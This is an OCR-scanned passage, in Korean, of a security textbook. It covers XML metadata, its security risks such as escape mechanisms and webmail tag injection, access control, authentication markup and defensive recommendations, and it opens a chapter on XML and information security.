XML 은 열린언어 이 다. 때 문에 이 언어를 확장할수 있는것 이 라고 한다. 물론 프로그 
람작성언어 들은 어 느정 도 확장할수 있는것 이 다. 동적 HTML 은 10 년전에 나온 HTML 과 류 
사할 따름이 다. 오늘의 열 람기 는 플라그인과 DOM (동적 객 체모형)을 리 용하여 동적 으로 
확장될수 있다. 현대 HTML 은 동적으로 확장할수 있다. 해석능력은 플라그인과 애플리트 
등을 리용하여 동적 으로 확장된 다. 

XML 을 리용하는 객 체의 소유자는 자기 가 선택한 임 의의 태 그들을 정 의할수 있으며 
그 정의를 객체에 내포시킬수 있다. 새 태그의 의미와 속성은 낡은 태그에서 서술된다. 
XML 은 IBM 에서 개 발하고 ISO 표준으로 채 택된 표준일 반표식언어 (SGML: Standard 
Generalized Markup Language) 의 변종이 다. XML 은 cXML(Commerce XML), VXML(Voice 
XML) 그리고 MSXML(Microsoft XML) 까지 포함한 많은 변종의 원형 이 다. 산업 용，응용 
프로그람용 지어는 봉사용변종들도 있을수 있다. 그러나 임의의 변종언어의 가치는 그것 
을 사용하는 몇몇 대 방들의 기능에 달려 있다. 

XML 은 세계적규모에서 쓰이는 언어이다. 말하자면 그것은 기업체들，산업들 지어는 
나라들의 경 계를 넘어서 쓰이는 세계 적스키마이다. 이 스키 마들은 자료의 의미와 리용에 
대한 사용자와 응용프로그람사이의 폭 넓은 사전약속을 표현하고 있다. XML 의 어휘규모 
는 COBOL 과 같은 프로그람작성언어의 규모와 대 조된다. COBOL 에서 는 자료서술이 흔히 
한 기 업소범위내 에 그리 고 종종 단일프로그람범위내 에 국한되 여 있다. 여 기서 동사의 기 
초모임 은 기 업소들사이 에 공통적 이 지 만 공통적 인 명 사들은 없 다. 

XML 은 이름공간의 개념을 실현한다. 즉 XML 은 이름과 그 의미사이에 하나이상의 
약속을 제 공한다. 목적하는 이 름공간은 태 그이 름 앞에 있는 두점 다음의 공간의 이 름에 


457 



의 하여 지 적 된다 (< ns : tagname >). 제 한된 문맥 에 서 만 쓰이 는 많은 특수어 휘 들과 함께 비 교 
적 작은 어휘들도 많이 약속할수 있다. 

XML 은 서 술언어이 다. XML 은 서 술문들을 명시적 으로 생성한다. 이 서 술문들은 절차 
에 관한것이 아니라 해석에 관한것이다. 그 서술문들은 어떻게 할것인가 하는것보다도 
오히려 무엇인가를 나타낸다. 그러나 태그이름들이 임의의 절차의 등가물인 임의의 정의 
를 교갑화할수 있다는것을 명심해 야 한다. 

XML 은 해 석 언어 이 다. BASIC , Java 및 HTML 과 같이 XML 은 응용프로그람에 의 하여 
해 석 된다. 그러 나 일관성 을 보장하고 XML 의 식응용프로그람을 쉽 게 구축하기 위하여 대 
체 로 표준적 인 구문해 석프로그람과 표준정 의 혹은 스키 마를 리용하게 된 다. 

XML 은 재 귀 적 이 다. XML 을 정 의 하는 객 체 인 XML 스키 마는 XML 로 작성 된 다. 이 스 
키마에는 참조형정의들이 있다. 실례 로 이 스키마는 보편적 인 URL 로 정의 를 참조할수 
있다. 사실 이 런 리용방법 은 태 그에 대 한 목적하는 정의를 찾는 가능성을 높여 주기때 문 
에 일 반적일뿐아니 라 종종 권고되 는것 이 다. 물론 자료소유자의 견지 에서 는 이 런 리용법 
은 안전하다. 이 리용법 은 소유자가 목적하는 정 의 들을 리용하여 태 그들을 해 석할수 있 
다는것을 소유자에게 담보한다. 자료수신자의 견지에서 보면 걱정스러운것은 오직 또 하 
나의 기만준위(즉 속임수)일수 있다. 여기서 좋은것은 URL 들이 령 역이름으로 시 작되는것 
이 다(한 령역의 이름들이 아주 믿음직하면서도 또한 위 조된것들일수 있다). 메 타자료의 
의미가 개별적인 객체에 기억될수 있으며 또 흔히 기억되지만 국부정의는 대역정의를 무 
시할수 있 다. 

그 객체 는《형 을 지적한》자료 즉 연산들의 특정한 모임 만이 타당하게 되는 자료 
형태들을 지원한다. 그러나 XML 로 정의된 자료의 모든 속성과 마찬가지로 자료에 대 
한 자의 적 인 연산들을 방지하는것은 언어 자체 인것 이 아니 라 언어의 응용인것 이 다. 실 
례로 

<simpleType name = “ nameType ” > 

〈restriction base = “ steing ” > 

<maxLength value : “32” /> 

</ restriction > 

</ simpleType > 

은 “ nameType ” 의 최대길이가 32 로 되게 한다. 이 런 류사한 메 타자료는 다른 제한조건을 
가하거나 문자모임，대소문자，유효값들의 모임 또는 범위，소수의 자리 또는 임의의 기 
타 속성 이 나 제 한과 갈은 속성 들을 정 의할수 있 다. 

XML 과 다른 태그메타자료언어들은 자료들에 크게 속박되지는 않는다. 말하자면 자 
료를 변경 시 킬 권한을 가진 사람은 메 타자료를 변경 시 킬수 있 다. 태 그를 변경시 킬 권한 
을 가진 사람은 자료로부터 그것을 분리시킬수 있다. 이런 유연한 결합은 메타자료를 변 
경 시키는 경우에 자료자체를 변경시키는것과는 다른 특권의 모임 이 요구되는 자료기지 와 
대조될수 있다(표 29-1 을 볼것). 
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표 29-1 


전자지갑: 실례 


통신에 메타자료를 리용하는 좋은 실례는 전자지갑응용프로그람이다. 그 소유자는 전자지갑을 
리용하여 전자인증서들을 기 억시키고 사용한다. 이 런 인증서들에는 이름과 주소，사용자 ID 들과 통 
과암호, 신용카드번호 등과 같은것들이 기록되여 있다. 이 모든 정보들은 로출되지 말아야 하므로 
그것들을 흔히 자료기지에 기억시킨다. 자료기지는 자료를 숨겨 둘수 있고 그 자료를 메타자료，예 
견된 의미 및 용도와 결합시킬수 있다. 반대로 메타자료와 파일암호화에 대한 태그들을 리용하여 단 
층파일에 자료를 기억시켜 리용되지 않을 때 기억장치에 그 자료를 숨겨 두게 할수 있다. 

사용자는 전자지 갑응용프로그람을 리 용하여 여 러 가지 방법 으로 인증서 들을 제 출한다. 례 를 들어 
사용자가 직결판매자로부터 구매 할것을 결심 했다고 생각해 보자. 선택 을 한 다음 사용자는 화면의 검 
사단추를 누른다. 그러면 검사화면이 제시된다. 이 화면은 이름과 료금청구주소，이름과 수화물주소 
그러 고 화물정 보를 요구한다. 사용자는 전자지 갑응용프로그람을 인입 하여 이 화면을 완성한다. 

전자지갑이 거기에 기억되여 있는 자료를 제시하면 사용자는 그것을누르고검사화면의 적당 
한 마당들에 끌어다 놓는다. 마당들에 표식들이 되여 있기때문에 사용자는 어떤 정보를 어디에 
넣어야 하는가를 안다. 이 표식들은 HTML 로 화면에 새긴다. 그것들이 사용자에게는 보이지만 
전자지 갑응용프로그람에 서는 보이 지 않는다. 그러 므로 사용자는 전자지 갑의 마당과 검 사화면의 
마당사이에 대웅을 시켜야 한다. 이 과정이 유연하지만 여기서도 역시 시간이 걸리게 된다. 이 
과정 이 종국적 으로는 바라는 결과를 얻게 하지 만 여 기서 자체정정귀 환조종과 중간오유시 정 을 진 
행하게 된 다. 사용자는 화면 이 완성되 여 만족하게 되 면 Submh 단추를 누른다. 바로 이 때 화면은 
판매자에게 귀환되며 판매자의 콤퓨터가 그것을 더 검증하고 또 한차례의 오유시정과정을 시작 
할수 있다. 

화면의 마당을 HTML 로 표식하는것 외 에 또한 판매 자가 XML 로 그 마당을 표식하면 XML 을 
아는 전자지 갑은 사용자를 위한 검 사화면의 부분을 자동적 으로 판정할수 있 다. 검 사화면 이 료금 
청 구정 보를 요구하는 경 우에 전자지 갑은 료금청 구서 를 완성할 정 보를 그 전자지 갑에 가지 고 있는 
가 하는것 을 살펴 본다. 여 러 가지 정 보가운데서 하나를 선택해 야 하는 경 우에 는 사용자가 선택하 
도록 한다. 화면 이 사용자가 요구하는대 로 완성되 였 으면 사용자는 Submit 단추를 누른다. 화면 이 
판매 자에 게 귀 환되 면 자료는 판매 자의 XML 로 알맞게 표식되 며 판매 자의 XML 을 아는 응용프로 
그람과 그의 기 업상대 자(즉 그의 신용카드거 래봉사자)는 자료를 확인 할수 있 다. 

XML 을 리용할 때 사용자가 쓰는 응용프로그람 또는 그 형 식,은 변화되 지 않았다. XML 은 응 
용프로그람의 자료와 그 의 미 를 변화시키 지 않았다. XML 은 그것 을 아는 응용프로그람들사이 의 
통신을 촉진시켰을 따름이다. XML 은 응용프로그람들사이의 통신을 더욱 자동화되게 하였다. 자 
료는 예견한 곳에 기억되고 예견한대로 조종되며 예견한대로 통신에서 쓰인다. 응용프로그람은 
더 자동적 으로 동작하고 오유의 기회 는 감소된다. 가장 유명 한 Amazon.com 과 일부 판매 업체 들의 
응용프로그람들이 그런 수준의 자동화를 이록하였다는것을 알아 두라. 그러나 그들은 자료를 재 
현하고 잘못된 곳에 기억시키는 피해를 보면서까지 자동화를 실현하고 있다. 즉 사용자자료가 판 
매 자체계 에 기 억된다. 이것은 그런 자료의 타개를 초래할수 있으며 또 이미 그런 타개를 빚어 내 
였다. 자료가 고객의 의뢰기에서보다 판매자의 봉사기에서 더 잘 보호된다고 주장할수도 있겠지 
만 각이한 사용자들을 통하여 자료를 수집하는것도 또한 더욱 매력 있는 목표이다. 
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바로 각이한 열람기들이 있는것처럼 각이한 전자지갑응용프로그람들이 있게 될것이다. 사람 
들은 열 람기 가 HTML 을 인식할것 을 요구하며 마찬가지 로 전자지 갑이 판매 자의 응용프로그람과 
같은 XML 의 변종을 인식할것 을 요구한다. 전자지 갑은 판매 자의 응용프로그람과 같은 XML 의 변 
종을 인식 한다는것을 확인하기 위하여 열 람기 웅용프로그람들이 여 러 가지 암호화알고리 듬을 인식 
하는 방법 과 류사하게 여 러 가지 XML 변종들을 인식할수도 있다. 

판매자의 응용프로그람이 사용자의 전자지갑으로부터 화면에 현시 되지도 않으며 사용자가 
제공하려고;* 하지 않는 정보를 요구할수도 있다는것을 알아 두라. 사용자는 자기의 응용프로그 
람 즉 전자지 갑의 거 동에 의 거하여 그것 이 허 용하는것 만을 송신한다. 

판매 자의 응용프로그람이 전자지 갑 혹#■ 그 자료들을 탐색하려 고 할수 있는것 과 같이 사용 
자는 판매 자를 속이기 위하여 판매 자가 보내는 래그들을 변경시키 려고 할수 있다. 판매 자는 자기 
의 응용프로그람에 의거하여 이러한 기만으로부터 자기를 보호한다. 


XML 의 능력과 제한성 

모든 도구는 그것이 할수 있는 가능성과 제한성을 가진다. 제한성들은 바로 그 도구 
의 개념에 고유한것일수 있거나(즉 나사돌리개는 못을 박는데는 쓸모 없다) 실행과정에 
생길수 있다(즉 나사돌리개의 손잡이와 날은 쓰는 과정에 류동이 있을수 있다). 도구는 
그것이 적용되는 객체에 적합하지 않을수도 있다(즉 나사돌리개가 너무 크거나 너무 작 
으므로 나사를 돌릴수 없다). 파리잡이에 곡사포를 사용하지는 않는다. 이 절에서는 
XML 의 능력，용도，오용，람용 및 제 한성과 류사한 메 타자료언어들을 취급한다. 

XML 은 메타자료이다. 그것은 자료에 대한 자료이다. 그 역할은 자료기지에서 스키마 
의 역할과 류사하다. XML 의 기 본역 할은 자료의 일 치성，의 미，용도를 전달하는것 이 다. 
XML 은 보안도구도 아니 며 본질 적취 약성 도 아니 다. 보안의 관점 에 서 보면 그 고유한 역 할 
은 통신을 지원하고 오유를 줄이는것이다. XML 의 잠재적인 부적합성 또는 위협의 측면은 
여기에만 유일하게 있는것이 아니다. 이런 측면은 다른 언어들, 메타자료，태그들 등이 다 
가지고 있는 측면이다. 흔히 진실을 전달하는데 쓰이는 언어도 거짓에 람용될수 있다. 

사람들은 HTML 을 리용하면서 HTML 과 함께 거 의 10년간이 나 살아 왔다. XML 이 
XML 에서 정의되는것 처 럼 XHTML 이 라고 하는 HTML 4.0 판도 그렇게 정의된다(재귀 개 념 
은 흔히 혼란을 가져 오며 때로는 공포를 주기도 한다). 사람들은 거의 한 세대나 EDI 태 
그들을 사용하여 왔다. 그 태그들이 지금은 XML 의 부분모임 이지만 그것들에 대한 모든 
경험은 아직도 쓸모 있다. 

아마도 XML 에서 대부분의 보안우려의 근원으로 되는것은 XML 이 《넣기 ( push )》 기 
술과 함께 쓰이는것 이다. 즉 자료를 서술하는 태그들은 자료와 함께 쓰인다. 더우기 자료 
해 석스키 마는 자료들에 포함될수 있 다. 이 모든것 은 수신자나 사용자에 게 아주 많은 지 
식이나 목적이 없는 상태에서 일어 난다. 그러나 그 의미는 접수하는 체계에서 해석될것 
이다. 이것은 우려를 자아내지만 그 의미는 자기의 규정대로 해석된다. 자료의 송신자만 
이 예견된 의미를 아는것이다. 

XML 에서 보안에 대 한 기 본책 임 은 해석기 에 있다. 열 람기 가 HTML 로부터 파일체계 



를 숨기는것처 럼 응용프로그람은 XML 로부터 그 파일체 계를 숨겨 야 한다. HTML 태 그를 
어떻게 나타낼것인가 하는것은 열람기가 결정하는것처럼 XML 태그의 의미는 응용프로그 
탐이 결정한다. 그러나 이렇게 하는데서 응용프로그람은 호출한 구문해석자에 의거하여 
그것 이 태 그들을 처 리하게 도와 줄수도 있 다. 응용프로그람이 구문해 석 자에 의 존하는 한 
에 있어서는 그 응용프로그람이 쓰고 있는 구문해석자가 정확한것 이라는것이 확인되여 
야 한다. 일 반적 인 실천은 프로그람이 환경 에 의 거하여 호출한 프로그람의 신원을 보증 
하게 하지만 홀륭한 보안실천은 응용프로그람이 구문의 신원 지어 그의 수자식서명을 검 
사할 정도까지 확인할것을 요구할수 있다. 

많은 해석언어들과 마찬가지 로 XML 은 그것 이 해석될수 있으리 라고 사용자 혹은 수 
신자가 기대하는 환경 또는 문맥에 XML 이 지령을 보내도록 허락하는 도피기구를 호출 
할수 있다. 이것은 XML 에서의 가장 심각한 로출일수 있다. 그러나 그것은 XML 에서만 
있게 되 는것 이 아니 다. 거 의 모든 프로그람작성 및 자료서 술언어 들은 그런 도피기 구를 
포함하고 있다. 이 도피기구들은 사용자가 자료라고 생각하는것을 처리에로 넘길 가능성 
을 가진다(표 29-2). 

표 29-2 Web 우편 : 실례 


《 Web 우편》은 보통의 2층 (two-tier) 의 뢰 기 /봉사기 전 자우편 을 3층 (three-tier) 의 뢰 기 /봉사기 프 
로그람으로 전환시킨다. 아마； fe 가장 잘 알려 진 실례는 Microsoft 회사의 Hot-mail 일것이다. 그러 
나 Excite 와 Yahoo 와 같은 다른 안내 싸이트 (portal site) 들은 자기 의 실 행 방법 들을 가진 다. 많을 인 
터네 트봉사제 공업체 들은 자기의 우편사용자들이 임의의 기 계 로부터, 방화벽 (HTTP 는 허 용하지 만 
우편을 제 한하는)뒤 로부터，공공봉사기들로부터 그들의 우편국에 접 근하도록 허 락하는 실 행 방법 
을 가전다. 

Web 우편에서 통보문은 중간층 (middle tier) 에서 실제로 해신되고 다루어 진다. 그 다음에 통 
보문은 Web 열 람기 에 의하여 워크스테 이 션에서 사용자에게 연시된다. 어떤 실현방법에서는 중간 
층이 태그들을 알아 볼수 없었고 Web 열람기에로 태그들을 단순히 넘겨 주기만 하였다. 공격자는 
이 능력 을 리 용하여 열 람기 가 사용자이 름과 통과암호칸이 있는 Web 우편접 속창문을 연시하게 하 
였다. 경험 있는 사용자는 기대하지 않던 접속창문이 나올 때에는 응답하지 않았지만 경험 없는 
사용자는 응답하였 다. 모든 응용프로그람들이 예 정한대 로 동작할 때 공격 자들은 그 프로그람들 
을 리용하여 사용자를 속일수 있었다. Web 우편은 래그들이 단순한 본문방식의 안전한 우편환경 
으로부터 불안전한 열람기환경에로 들어 가게 하였다. 


이 수법은 XML 과 같은 언어들의 중요한 특징을 보여 준다. 이 특징은 선어들에 대하여 
론할 때 흔히 스쳐 버리기 쉬운것이다. 이 언어들은 말단사용자에게는 투명하다. 말단사용자는 
이 언어들이 전달하는 통신내용은 고사하고 이 언어들이 존재한다는것조차 알지 못하며 또한 
자기체계, 자기웅용프로그람 또는 자기 자신에게 의미가 어떻게 전달되는지도 모로는것이다. 

그런 기구들은 대부분이 사용되기 시작한데 불과하지만 나쁘게 쓰일수 있는 잠재력 
을 가지 고 있 다. 비 루스들은 Word , Excel 및 Visual Basic 에 포함되 여 있는 도피기 구들을 
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교묘하게 리용하여 자신들을 실행하고 기억장치에 접근하여 복사본을 기억시키며 또한 
사용자에게 오도된 정보를 연시한다. 


Web 보안 

XML 이 Web 보다도 다른 많은 응용프로그람들에서 리용되지 만 Web 은 흥미 있고 중 
요한 프로그람이다. 론의된바와 같이 XML 은 Web 의 보안을 거의나 악화시키 지 않는다. 
XML 이 사용자들과 응용프로그람들을 속이 기 위하여 사용될 수 있는것 은 사실 이 다. 그러 
나 그런 취약성들은 다른 언어 또는 방법들에 의해서도 역시 쉽게 람용될수 있다. 자료 
의 용도와 의미를 더욱 명백하게 함으로써 XML 은 그 리해를 촉진시 킬수 있다. 

다른 한편 XML 은 통신을 개 선하고 오유를 줄이는 잠재 력 을 가지 고 있 다. XML 은 
Web 의뢰기와 봉사기들의 능력 을 확장하는데 쓰이며 그 응용프로그람들의 보안을 높여 
준다. 이 능력들은 다른 방법들로 실현될수도 있고 XML 에 의해서도 실현된다. 이 능력이 
메 타자료언어로 실현되고 있다는 사실은 그런 언어들의 한가지 우점을 보여 주는것이 다. 
이 실현들은 가동환경과 전송에 대하여 다 같이 독립적 인 운용호환성을 포함하여 메타자 
료언어들의 많은 우점들을 보안할수 있는 잠재력을 가진다. 그러나 이런 정의들은 XML 
의 보안에 관한것 이 아니 라 오히 려 보안을 위한 XML 의 리용에 관한것 이 다. 

XML 객체에 대한 접근조종 

그런 한가지 응용방법은 Web 봉사기들에 보관된 문서나 임의의 객체들에 대한 접근 
조종이다. 그 방법은 자료기지객체에 대한 접근조종과 류사하다. 의뢰기/봉사기프로그람 
들에 서 XML 은 SQL 요구와 류사할수 있 다. 즉 XML 은 요구되 는 자료를 지 정 하기 위 하여 
쓰인 다. 자료기 지봉사기 가 보관된 자료와 봉사에 대 한 접 근을 제 한하는것 처 럼 XML 요구 
에 응하는 봉사기는 자기가 봉사하는 자료에 대한 접근을 조종할수 있다. 

SQL 에서 요구와 조종의 기본대상은 표 (table) 이다. 그러나 대부분의 자료기지봉사기 
들은 또한 더 욱더 치밀한 조종을 제 공하게 될것 이 다. 실례 로 그런 봉사기들은 행，렬 혹 
은 지어 세포에 대한 임의의 접근조종을 보장할수도 있다. 많은 봉사기들은 보기 (view) 라 
는 자료들의 임의의 결합에 대 하여 조종을 실행할수 있다. 자료에 대 한 임의의 접근조종 
이 언어 나 스키 마의 기 능이라기 보다 자료기 지관리 자의 기 능이 라는것 을 알아 두라. 또한 
자료가 자료기지관리자의 손에 있을 때에만 스키마에 결합된다는것을 명심하라. 자료기 
지관리자가 자료를 다 봉사할 때에는 자료의 무결성을 보존하기 위하여 믿음직한 경로들 
과 과정들이 요구될수 있다. 

HTML 에서와 같이 XML 에서 접근조종의 기본대상은 문서이다. 이 목적으로부터 문서 
는 자료기 지표와 류사하게 된 다. 거 의 모든 봉사기 들이 일 부 페 지 들에 대 한 접 근을 제 한 
할수 있다. 이런 능력이 드물게 리용되지만 많은 봉사기들은 폐지들에 대한 임의의 접근 
조종을 제공한다. 즉 이 봉사기들은 일부 사용자들에게 한페지에 대한 접근을 허용하면서 
도 다른 사람들에게는 허용하지 않는 능력을 가지게 된다. 실례로 Apache Web 봉사기는 
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특정한 사용자들，사용자그룹들， IP 주소들 또는 주소/사용자쌍들의 이름 달린 문서들에 대 
한 접근을 경영인이 허락하거나 제한하도록 승인한다. 자료기지관리자가 같은 자료에 대 
한 여러가지 보기들을 지정함으로써 보다 치밀한 접근조종을 실행할수 있는것처럼 봉사 
기의 관리자도 역시 각이한 문서들을 만듦으로써 보다 치밀한 조종을 실행할수 있다. 

그러나 태그들은 문서보다 더 세밀한 객체들을 상세히 서술하는데 쓰인다. 이것은 
보다 치밀한 접근조종의 가능성을 제공한다. 자료기지관리자가 표보다 더 치밀한 접근조 
종을 보장하는것처럼 봉사기도 페지보다 더 치밀한 접근조종을 보장할수 있다. 이것을 
기어코 하려고 한다면 임의의 태그객체의 수준까지도 할수 있을것이다. 

공정 대 공정인증 

Web 상에서 특히 전자상업거 래 응용프로그람들에서 의 뢰 기공정 은 자기신원을 봉사기 
공정에 보여 주는것이 종종 필요하다. 믿을수 있는 제3자들이 이런 《성의》를 보여 주 
게 된다. 이러한 체계들에서는 인증서를 위조 또는 재현하지 못하도록 하는 방법으로 자 
료를 교환할수도 있다. 이러한 교환을 위하여 규약을 잘 작성한다. 이 규약들을 구조화된 
자료에 서 술한다. XML 에 서 이 런 교환에는 두개 의 스키 마가 있 다. 즉 하나는 인 증서 자체 
를 위한것 이 고 다른 하나는 인증서 들을 요구하기 위한것 이 다. 

XML 의 한 변종인 authXML 은 이 런 프로그람을 위 한것 이 다. 그것 은 신원확인을 요구 
하기 위 한 자료와 이 요구를 지 원 하는 증거 를 위 한 형 식 화들 ( format ) 을 정 의 한다. 

공정 대 공정무결성 

우의 경우와 마찬가지 로 전자상업 거 래응용프로그람들에서는 거 래를 수자식 으로 서명 
하여 그 신원과 내용을 보여 줄수 있다. 이렇게 하자면 거래자체와 서명 및 인증서를 위 
한 태 그들이 필요하다. 보안봉사표식 달기 언어 ( SML : Security Services Markup Language ) 는 
기업 대 기업 ( B 2 B ) 거래 및 기업 대 소비자 ( B 2 C ) 거래에 망라된 회사들사이에서 보안봉사 
를 공유하기 위한 공통언 어 를 제 공한다. 

권고사항 


1. 자료를 식 별 하고 태 그로 표식하라. 자료에 대 한 태 그들을 보존하라. 통신에 쓸모 
있 고 또 리 용되 고 있는 한 메 타자료는 무엇 보다도 자료소유자가 리용하기 위한것 
이다. 

2. 자료에 메 타자료를 붙여 놓으라. 자료기 지관리 자，접 근조종보관고，암호기 법，신뢰 
응용프로그람과 체계들 및 신뢰경 로들을 리용하라. 

3. 의존하고 있는것을 확중하라. 이것이 현대망세계에서 기본보안규칙이다. 객체서술 
에 의 거하는 경 우에 그 서 술을 사용하고 있 다는것 을 확신하라. 숨겨 진 스크립 트 
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가 없는 객체에 의존하는 경우 스크립트를 꼭 찾아 보라. 

4. 믿 음직한 원천에 서 만 태 그들을 접 수하라. 한 원천의 태 그와 자료들을 다 같이 중 
시해야 한다. 한 원천의 태그없는 자료를 접수하지 말며 태그없이 자료를 접수할 
수 없는 곳에서는 태그들이 있는 자료들을 접수하지 말라. 

5. 예견되지 않은 태그들이 있는 자료들은 접수하지 말라. 그 태그들을 넘기지 말라. 
태그들을 벗기지도 말고 자료들을 넘기지도 말라. 

6 . 사용기록부와 실행기록부에 태 그들을 포함시키 라. 이 렇게 하면 사용기 록부와 실 
행기록부의 무결성과 리용성을 높일뿐아니라 책임해명을 개선할수 있다. 

7. 규정되여 있고 쓸모 있는 보안태그들을 사용하라. 

8. 응용프로그람개 발자들과 적중한 표준，절차 및 시 행관리 자들에게 이 권고사항들 

을 통보하라. 이 대책들이 메타자료의 안전한 리용에 필수적이지만 그 리용과 조 
종은 흔히 다른 문제를 우선시하는 사람들의 손에 달려 있다. 

9. 말단사용자들이 초래하는 결과에 집 중하라. 결국 응용프로그람의 보안은 말단사 
용자가 리해 하고 수행하는것 에 달려 있 다. 

결 론 


HTML 과 그와 류사한 메타자료언어들은 10년전에는 상상도 할수 없었던 각이한 수 
준의 운용호환성 을 가져 다 주었 다. 인터네 트에서 운용호환성 이 있는 체 계 들의 수가 선형 
적으로 늘어 났다면 사용자들이 덕을 보는 그 가치는 기하급수적으로 늘어 났다. XML 은 
그 운용호환성 을 보다 높은 단계 로 끌어 올릴것 을 기 약한다. XML 은 인터네 트에서 의 뢰 
기와 봉사기사이의 운용호환성을 창조하는데 도움을 줄뿐아니라 지적된 임의의 객체들과 
공정들사이의 운용호환성도 개선하게 된다. XML 은 자료의 의미와 목적을 그대로 전달함 
으로써 자료의 편의성과 가치를 높이게 된다. COBOL 이 출현하기전까지는 그런 약속을 할 
도구가 없었다. 이 약속은 충분히 실현될것 갈고 또 큰 규모로 실현될수도 있을것 이 다. 

그러나 임의의 도구와 마찬가지로 XML 의 가치는 대체로 그것을 리용하는 사람의 
기술기능수준에 달려 있다. 임의의 착상과 마찬가지로 XML 의 가치는 그에 대한 리해에 
달려 있다. 임의의 새 기술과 마찬가지로 XML 의 가치는 공포와 무식으로 인하여 충분히 
발현되지 못할수도 있다. 

임의의 새로운 도구를 쓸 때와 마찬가지로 XML 의 능력과 제한성에 대하여 리해해 
야 한다. 정보기술에서는 제한성에 대한 충분한 고려가 없이 도구들을 사용하는것과 같 
은 많은 문제들을 야기시키는 현상은 거의 없었다. 

XML 의 리 용은 종종 정 보보안전문가들의 시 야밖에 있 었지만 누구도 XML 의 제 한성， 
오용 및 람용에 대 하여 우려하지 않을것 이 다. XML 의 제 한성，오용 및 람용으로 인하여 
기업이 손실을 당하는 경우에는 그에 대하여 우리가 책임을 지게 될수도 있을것이다. 이 
런 제한성，오용，람용으로 인하여 이 중요한 견해가 은을 내지 못하게 되면 우리모두는 
그로 인 하여 더 욱 난처하게 될 수도 있 을것 이 다. 



제 3 0 장. XML 과 정보보안 

사무엘 씨 엠씨콜린토크 

정보기술은 나날이 변해 가며 세계는 거의 매해 정보시대의 새로운《성배》를 받아 
안게 된 다. 바로 그것 이 확장표식 언 어 (XML: eXensible Markup Language) 이 다. XML 의 심 
장부는 복합자료구조들을 서술할수 있는 본문에 기초한 간단한 언어이다. 그 간단성으로 
하여 거의 모든 콤퓨터들이 XML 을 리용할수 있으며 모든 형 태의 망들이 그것을 전송할 
수 있 다. XML 은 거 의 모든 판매 업 체들로부터 매 우 광범한 지 원을 받아 거 의 모든 콤퓨 
터체 계들이 현존하부구조를 크게 수정하지 않고도 XML 을 조작할수 있게 하였다. 그렇 다 
면 무엇이 문제 인가. 

기 본문제 들은 변하지 않았다. 인터네 트는 이 전처 럼 불안전한데 기 술은 무서 운 속도 
로 발전한다. 일부 사람들은 오유를 범하고 다른 사람들은 정보를 훔치거나 파피한다. 지 
금까지 구축된 모든 콤퓨터체 계들에 GIGO(garbage_in garbage-out 즉 불완전한 자료를 입 
력시키면 결과도 불완전하다는 말)가 아직도 그대로 적용된다. XML 은 이 모든것을 조금 
도 변화시키지 못하였으며 오히 려 또 하나의 람용의 길을 열 어 놓는다. XML 은 전진하는 
보안사업에 망라될 또 하나의 대상으로서 몇가지 보안약점도 보충하고 있다. 

XML 의 많은 정 보보안문제 들이 현존하는 문제 들과 공통적 이라는 사실은 XML 을 현 
행보안실천에 쉽게 적응시킬수 있게 한다. 또한 XML 은 바로 그 본성으로 하여 언어의 
《 확장》들을 만들어 암호기 법 과 갈은 각이한 XML 보안해 결 책 들을 명 확하게 제 시할수 
있게 한다. 주요판매 업 체 들은 이 미 XML 환경보안을 설 계하였 으며 XML 에 서 의 암호화기 
법과 수자식서명의 새로운 표준들을 제기하였다. 그러나 최근의 해결책들은 결코 완성된 
것 들이 아니 다. 프로그람작성 자들, 자료기 지관리 자들 및 경 영 자들은 XML 이 자료를 보다 
쉽게 읽고 조직하고 보급할수 있게 하며 임의의 기존자료들을 효과적으로 바꾸지 않으면 
서 알맞는 보안을 계 획 한다는 사실 에 주의 를 돌려야 한다. 

XML 은 우리 의 모든 정 보기 술을 리용하면서 계 속 빠른 속도로 발전할것 이 다. 래일의 
정 보보안전문가들은 XML 이 리용하는 자원을 보존해 야 할것 이 다. 이 전문가들은 또한 그 
들이 사용하는 많은 보안도구들에 XML 이 통합되는것을 보게 될것 이 다. 그러므로 정보보 
안전문가를은 XML 과 XML 응용프로그람보안문제 들을 리 해 할 필 요가 있 다. 

XML 기초 


XML 과 XML 보안문제 들을 리해하자면 그 배 경을 좀 알아 두는것 이 필요하다. 정 보 
보안전문가들에게는 이것이 자기들의 적을 알게 되는것으로 보일수 있는가 하면 기술적 
으로 초래된 정신분렬증에로 또 한걸음 들어 가는것으로도 보일수 있다. 
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왜 HTML 이 아닌가 


HTML(Hyper Text Markup Language ) 는 World Wide Web 의 기초의 하나이 다. HTML 
은 특히 단순하고 리용하기 쉬 우며 세계 에서 가장 성 과적 인 출판언어의 하나로 되 였 다. 
지 어 프로그람작성 자가 아닌 사람도 HTML 의 기 초원 리 들과 문서 를 정 의하는 코드나 
《 태 그〉〉들을 배 울수 있으며 Web 싸이 트들을 만들수 있다. 그러 나 HTML 은 자기 성 과의 
희 생 물로 되 였 으며 HTML 리 용의 편의 성 은 Web 의 성 장과 그에 대 한 기 대 로부터 나온 제 
한성 들에 직 면 하게 되 였 다. 즉 그에 대 한 기대 로부터 : 

• HTML 은 확장될 수 없 으므로 특정한 요구들을 위한 태 그들을 정 의할수 없 다. 만 
일 그렇 지 않다면 각이한 열 람기판매 업 자들은 열 람기 들의 새 로운 기 능확장들을 
고안하여 개 발자들에 게 무서 운 두통거 리 를 제 기할것 이 다. 

• HTML 은 문서 의 내 용이 아니 라 형 식 만을 서 술함으로써 Web 상에 서 특정 한 내 용 
을 발견 하는데 더 큰 난관을 조성한다. 

• HTML 은 개 별적요소들을 의 미적 으로 표식할수 없으므로 매 요소가 무엇을 의 미 
하는지(즉 집주소와 전자우편주소사이의 차이) 지적할수 없게 한다. 

Web 에 기초한 정보의 확산은 그 모든 정보를 식별할 능력이 우리에게 없는것으로 
하여 실효성이 없는것으로 되고 있기때문에 HTML 의 이 제한성들은 사실상 Web 의 속도 
를 늦추고 있다. WWW 으로 알려 진 이 른바《 빛속도》망의 속도는 기 여 가는 속도로 
떨 어 지 고 있 다. 특정한 싸이 트뿐아니 라 제 품의 가격 또는 빛갈과 같은 그 싸이트안의 
특정한 정 보도 있을수 있는 선택 의 경 우가 지 나치 게 많은 사정 으로 탐색하는데 시 간이 
더 많이 걸린 다. 

SGML ： 그 모든것의 시원 

HTML 이 일으키는 문제들을 리해 하기는 어 렵지 않았다. 1996년 W 3 C(the World Wide 
Web Consortium ) 는 해 결책 을 찾기 위 하여 어머 니 언어 즉 SGML(the Standard Generalized 
Markup Language ) 에로 소급하여 보았다. 대부분의 사람들은 HTML 이 SGML 의 아주 단순 
